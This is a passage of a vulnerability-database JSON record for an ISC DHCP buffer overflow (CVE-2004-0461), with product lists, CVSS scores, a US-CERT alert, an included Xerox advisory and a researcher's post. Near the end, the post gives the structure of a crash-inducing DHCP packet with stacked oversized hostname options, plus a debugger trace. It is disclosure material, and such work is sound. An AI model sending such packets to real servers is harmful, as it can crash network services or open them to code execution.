      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200408-0175",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": null,
        "scope": null,
        "trust": 1.6,
        "vendor": "fedora",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 1.6,
        "vendor": "infoblox",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 1.6,
        "vendor": "mandrakesoft",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 1.6,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "fedora core",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "redhat",
        "version": "core_2.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "suse",
        "version": "8.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "suse",
        "version": "8.0"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "9.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "7"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "9.0"
      },
      {
        "model": "linux firewall cd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "dns one appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "infoblox",
        "version": "2.4.0.8"
      },
      {
        "model": "linux connectivity server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "10.0"
      },
      {
        "model": "dns one appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "infoblox",
        "version": "2.3.1_r5"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "8.2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "9.1"
      },
      {
        "model": "linux database server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "9.2"
      },
      {
        "model": "dhcpd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "isc",
        "version": "3.0.1"
      },
      {
        "model": "dns one appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "infoblox",
        "version": "2.4.0.8a"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "9.0"
      },
      {
        "model": "linux admin-cd for firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "email server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "iii"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "8"
      },
      {
        "model": "linux office server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "isc",
        "version": null
      },
      {
        "model": "dhcp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "isc",
        "version": "3.0.1rc12"
      },
      {
        "model": "dhcp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "isc",
        "version": "3.0.1rc13"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "8"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "7"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "8.0"
      },
      {
        "model": "suse email server iii",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9.1"
      },
      {
        "model": "linux personal x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9.0"
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9.0"
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "8.2"
      },
      {
        "model": "linux office server",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "linux firewall on cd",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "linux database server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "0"
      },
      {
        "model": "linux connectivity server",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "linux admin-cd for firewall",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "fedora core2",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "linux mandrake amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "10.0"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "10.0"
      },
      {
        "model": "linux mandrake amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.2"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.2"
      },
      {
        "model": "linux mandrake ppc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.1"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.1"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.0"
      },
      {
        "model": "dhcpd rc13",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "isc",
        "version": "3.0.1"
      },
      {
        "model": "dhcpd rc12",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "isc",
        "version": "3.0.1"
      },
      {
        "model": "dns one appliance .0-8a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "infoblox",
        "version": "2.4"
      },
      {
        "model": "dns one appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "infoblox",
        "version": "2.4.0-8"
      },
      {
        "model": "dns one appliance -r5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "infoblox",
        "version": "2.3.1"
      },
      {
        "model": "dhcpd rc14",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "isc",
        "version": "3.0.1"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#317350"
      },
      {
        "db": "CERT/CC",
        "id": "VU#654390"
      },
      {
        "db": "BID",
        "id": "10591"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000617"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-117"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0461"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:isc:dhcp",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000617"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Gregory Duchemin\u203b c3rb3r@hotmail.com\u203bSolar Designer\u203b solar@openwall.com",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-117"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2004-0461",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2004-0461",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-8891",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2004-0461",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#317350",
            "trust": 0.8,
            "value": "25.52"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#654390",
            "trust": 0.8,
            "value": "14.21"
          },
          {
            "author": "NVD",
            "id": "CVE-2004-0461",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200408-117",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-8891",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#317350"
      },
      {
        "db": "CERT/CC",
        "id": "VU#654390"
      },
      {
        "db": "VULHUB",
        "id": "VHN-8891"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000617"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-117"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0461"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The DHCP daemon (DHCPD) for ISC DHCP 3.0.1rc12 and 3.0.1rc13, when compiled in environments that do not provide the vsnprintf function, uses C include files that define vsnprintf to use the less safe vsprintf function, which can lead to buffer overflow vulnerabilities that enable a denial of service (server crash) and possibly execute arbitrary code. The Internet Systems Consortium\u0027s (ISC) Dynamic Host Configuration Protocol (DHCP) 3 application contains a buffer overflow vulnerability. As a result, you may gain administrative privileges on vulnerable systems. \nOn systems which lack the vsnprintf() library call, ISC DHCPD defines vsnprintf as:\n#define vsnprintf(buf, size, fmt, list) vsprintf (buf, fmt, list)\nThis definition discards the size argument to the function, potentially allowing any occurrence of vsnprintf() to be exploitable, by overflowing whatever intended buffer is passed to the library call. \nOther locations in DHCPD utilizing this function may be exploitable. \nThis issue is reported to affect ISC DHCPD versions 3.0.1rc12 and 3.0.1rc13. ISC DHCP calls vsnprintf() to write format log file strings. \n\n----------------------------------------------------------------------\n\nSecunia is proud to announce the availability of the Secunia Software\nInspector. \n\nThe Secunia Software Inspector is a free service that detects insecure\nversions of software that you may have installed in your system. When\ninsecure versions are detected, the Secunia Software Inspector also\nprovides thorough guidelines for updating the software to the latest\nsecure version from the vendor. 
\n\nTry it out online:\nhttp://secunia.com/software_inspector/\n\n----------------------------------------------------------------------\n\nTITLE:\nXEROX WorkCentre Products Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA23265\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/23265/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nSecurity Bypass, Manipulation of data, Exposure of system\ninformation, Exposure of sensitive information, DoS, System access\n\nWHERE:\n\u003eFrom local network\n\nOPERATING SYSTEM:\nXerox WorkCentre\nhttp://secunia.com/product/4746/\nXerox WorkCentre Pro\nhttp://secunia.com/product/4553/\n\nDESCRIPTION:\nSome vulnerabilities and weaknesses have been reported in various\nXEROX WorkCentre products, which can be exploited by malicious people\nto bypass certain security restrictions, expose certain sensitive\ninformation, cause a DoS (Denial of Service), and compromise a\nvulnerable system. \n\n1) Input passed to the TCP/IP hostname, the Scan-to-mailbox folder\nname field, and to the Microsoft Network configuration parameters in\nthe Web User interface is not properly sanitised. \n\n2) Certain browser settings may allow unauthorized access. \nAdditionally, an unspecified vulnerability in the Web User Interface\ncan be exploited to bypass the authentication. \n\n3) The TFTP/BOOTP auto configuration can be exploited to manipulate\ncertain configuration settings. \n\n4) An unspecified error within the handling of email signatures can\nbe exploited to display improper items. \n\n5) Requests to web services can be made through HTTP instead of\nHTTPS. Other unspecified HTTP security issues and a httpd.conf\nmisconfiguration are also reported. \n\n6) An error within the Scan-to-mailbox feature can be exploited to\nanonymously download secure files. Additionally, it is possible to\nanonymously download audit log files. \n\n7) The system fails to keep accurate time resulting in incorrect time\nstamps in audit logs. 
\n\n8) The embedded Samba version contains various vulnerabilities. \nAdditionally, the SMB \"Homes\" share is visible and it\u0027s possible to\nbrowse the file system via SMB. \n\n9) The SNMP agent does not return errors for non-writable objects. \nAdditionally, authentication failure traps can\u0027t be enabled or\ngenerated. \n\n10) An error within ops3-dmn can be exploited to crash the service\nand cause a DoS by attaching a PS script. \n\n11) It is possible to bypass the security restriction and boot\nAlchemy by e.g. using an USB thumb drive. \n\n12) The \"Validate Repository SSL Certificate\" scan feature does not\nverify the FQDN. \n\n13) Certain problems with the Immediate Image Overwrite and On Demand\nImage Overwrite, a Postgress port block, and a http TRACE XSS attack\nin the network controller are reported. \n\n14) Two boundary errors within the embedded DHCP implementation can\nbe exploited to cause a buffer overflow, which may allow execution of\narbitrary code. \n\nSOLUTION:\nApply updated software (see vendor advisories for detailed\ninstructions). \n\nPROVIDED AND/OR DISCOVERED BY:\nReported by the vendor. \n\nORIGINAL ADVISORY:\nXerox:\nhttp://www.xerox.com/downloads/usa/en/c/cert_XRX06_006_v1b.pdf\nhttp://www.xerox.com/downloads/usa/en/c/cert_XRX06_004_v11.pdf
\n\n----------------------------------------------------------------------\n\n\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n               Technical Cyber Security Alert TA04-174A\n                Multiple Vulnerabilities in ISC DHCP 3\n\n   Original release date: June 22, 2004\n   Last revised: --\n   Source: US-CERT\n\nSystems Affected\n\n     * ISC DHCP versions 3.0.1rc12 and 3.0.1rc13\n\nOverview\n\n   Two vulnerabilities in the ISC DHCP allow a remote attacker to cause a\n   denial of the DHCP service on a vulnerable system. It may be possible\n   to exploit these vulnerabilities to execute arbitrary code on the\n   system. \n\nI. \n\n   VU#317350 discusses a buffer overflow vulnerability in the temporary\n   storage of log lines. In transactions, ISC DHCPD logs every DHCP\n   packet along with several pieces of descriptive information. The\n   client\u0027s DISCOVER and the resulting OFFER, REQUEST, ACK, and NAKs are\n   all logged. In all of these messages, if the client supplied a\n   hostname, then it is also included in the logged line. As part of the\n   DHCP datagram format, a client may specify multiple hostname options,\n   up to 255 bytes per option. These options are concatenated by the\n   server. If the hostname and options contain only ASCII characters,\n   then the string will pass non-ASCII character filters and be\n   temporarily stored in 1024 byte fixed-length buffers on the stack. If\n   a client supplies enough hostname options, it is possible to overflow\n   the fixed-length buffer. \n\n   VU#654390 discusses C include files for systems that do not support\n   the bounds checking vsnprintf() function. These files define the\n   bounds checking vsnprintf() to the non-bounds checking vsprintf()\n   function. 
Since vsprintf() is a function that does not check bounds,\n   the size is discarded, creating the potential for a buffer overflow\n   when client data is supplied. Note that the vsnprintf() statements are\n   defined after the vulnerable code that is discussed in VU#317350. \n   Since the preconditions for this vulnerability are similar to those\n   required to exploit VU#317350, these buffer overflow conditions occur\n   sequentially in the code after the buffer overflow vulnerability\n   discussed in VU#317350, and these issues were discovered and resolved\n   at the same time, there is no known exploit path to exploit these\n   buffer overflow conditions caused by VU#654390. Note that VU#654390\n   was discovered and exploitable once VU#317350 was resolved. \n\n   For both of the vulnerabilities, only ISC DHCP 3.0.1rc12 and ISC DHCP\n   3.0.1rc13 are believed to be vulnerable. VU#317350 is exploitable for\n   all operating systems and configurations. VU#654390 is only defined\n   for the following operating systems:\n\n     * AIX\n     * AlphaOS\n     * Cygwin32\n     * HP-UX\n     * Irix\n     * Linux\n     * NextStep\n     * SCO\n     * SunOS 4\n     * SunOS 5.5\n     * Ultrix\n\n   All versions of ISC DCHP 3, including all snapshots, betas, and\n   release candidates, contain the flawed code. \n\n   US-CERT is tracking these issues as VU#317350, which has been assigned\n   CVE CAN-2004-0460, and VU#654390, which has been assigned CVE\n   CAN-2004-0461. \n\nII. \n\nIII. Solution\n\n   Apply patches or upgrade\n\n   These issues have been resolved in ISC DHCP 3.0.1rc14. Your vendor may\n   provide specific patches or updates. For vendor-specific information,\n   please see your vendor\u0027s site, or look for your vendor infomation in\n   VU#317350 and VU#654390. As vendors report new information to US-CERT,\n   we will update the vulnerability notes. \n\nAppendix B. 
References\n\n     * http://www.isc.org/sw/dhcp/\n     * http://www.kb.cert.org/vuls/id/317350\n     * http://www.kb.cert.org/vuls/id/654390\n   _________________________________________________________________\n\n   US-CERT thanks Gregory Duchemin and Solar Designer for discovering,\n   reporting, and resolving this vulnerability. Thanks also to David\n   Hankins of ISC for notifying us of this vulnerability and the\n   technical information provided to create this document. \n  _________________________________________________________________\n\n   Feedback can be directed to the author: Jason A. Rafail\n  _________________________________________________________________\n\n   The latest version of this document can be found at:\n     \n     \u003chttp://www.us-cert.gov/cas/techalerts/TA04-174A.html\u003e\n  _________________________________________________________________\n     \n   Copyright 2004 Carnegie Mellon University. \n     \n   Terms of use:\n     \n     \u003chttp://www.us-cert.gov/legal.html\u003e\n   \n  _________________________________________________________________\n\n   Revision History\n\n   June 22, 2004: Initial release\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niD8DBQFA2HFSXlvNRxAkFWARArH4AKDtUECQTE5HXmvsDQkwcWn9r7uAowCdGTHq\nAqWt3CgdEPJcIFDbJlIWQHo=\n=HSxN\n-----END PGP SIGNATURE-----\n. Hi,\nfor those interested to reproduce the recent DOS attacks against ISC \nDHCPD 3.0.1 rc12 and rc13\nas described in:\nhttp://www.kb.cert.org/vuls/id/317350\n, i\u0027m forwarding the first email i sent to ISC describing several stack \nbased buffer overflows occuring during the creation\nof log messages and triggered by sending several DHCP HOSTNAME options \nwithin a single request. \nThis mail also includes a trace of such DHCP REQUEST. \n\nOther .bss overflows related to vsnprintf and identified later during \nour investigations as described in:\nhttp://www.kb.cert.org/vuls/id/654390\ncan be triggered the exact same way. 
\nNote that the home made tool i am referencing in this email will be made \navailable very soon and already includes ISC, INFOBLOX and DLINK dhcp \nvulnerabilities\nI will drop a note here when it is finally released. \ncheers,\nGregory\n\nSpecial thanks to Solar Designer and David W.Hankins (ISC)\n\n\n--- Original email ------\n\nSummary:\n\ni have discovered several stack based overflow in your dhcp-3.0.1rc12 \nand rc13 (may be others, have not checked)\nthese vulnerabilities can be easily triggered by crafting a dhcp \ndiscover or request packet which carries several  hostname dhcp options that\n,once reassembled by the daemon (as explained in rfc 3396), overflow a \nstack based variable causing the daemon to crash. \nI believe than one might execute code remotely on the server with the \nsame user account dhcpd is running with, root in most cases. \nI have been able at some points during the tests, to control eip\u0027 4 \nbytes (intel 32bits arch), it was during the ddns forward update operation. \nNote that all tests have been made on a linux 2.4.20-24.9 using a home \nmade tool to generate custom dhcp traffic\n\nNow an example:\n\nsee dhcpd.conf in attachment if you need it. 
\n\nstructure of an offending packet (case of a dhcp request based attack)\n\n \u003e\u003e DHCP  request\n \u003e\u003e from 0.0.0.0:68 (ff:ff:ff:ff:ff:ff) to 255.255.255.255:67 \n(ff:ff:ff:ff:ff:ff)\n\n \u003e\u003e op     : BOOT REQUEST (1)\n \u003e\u003e htype  : Ethernet (10Mb) (1)\n \u003e\u003e hlen   : 6\n \u003e\u003e hops   : 0\n \u003e\u003e xid    : 0x00000000\n \u003e\u003e secs   : 1\n \u003e\u003e flags  : UNICAST (0x0000)\n \u003e\u003e ciaddr : 0.0.0.0\n \u003e\u003e yiaddr : 0.0.0.0\n \u003e\u003e siaddr : 255.255.255.255\n \u003e\u003e giaddr : 0.0.0.0\n \u003e\u003e chaddr : ff:ff:ff:ff:ff:ff\n \u003e\u003e sname  :\n \u003e\u003e file   :\n \u003e\u003e cookie : 0x63825363 (RFC 1497/2132, BOOTP Vendor informations/DHCP \noptions)\n \u003e\u003e DHCP  option  (053 [0x35]) : MESSAGE_TYPE : REQUEST\n \u003e\u003e BOOTP option  (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e BOOTP option  (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e BOOTP option  (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e BOOTP option  (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e BOOTP option  (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e BOOTP option  (012 [0x0c]) : HOSTNAME : 
\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e BOOTP option  (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e DHCP  option  (050 [0x32]) : REQUEST_IP : 192.168.0.99\n \nsending this packet to the ptraced daemon  (within gdb) gives:\n\n(gdb) run -f -d\nThe program being debugged has been started already. \nStart it from the beginning? (y or n) y\nStarting program: /usr/sbin/dhcpd -f -d\nInternet Software Consortium DHCP Server V3.0.1rc13\nCopyright 1995-2003 Internet Software Consortium. \nAll rights reserved. \nFor info, please visit http://www.isc.org/products/DHCP\nWrote 0 deleted host decls to leases file. \nWrote 0 new dynamic host decls to leases file. \nWrote 0 leases to leases file. \nListening on LPF/eth0/00:0d:88:b5:95:0c/192.168.0.0/24\nSending on   LPF/eth0/00:0d:88:b5:95:0c/192.168.0.0/24\nSending on   Socket/fallback/fallback-net\nUnable to add forward map from 
\nbobAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-1022AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8 
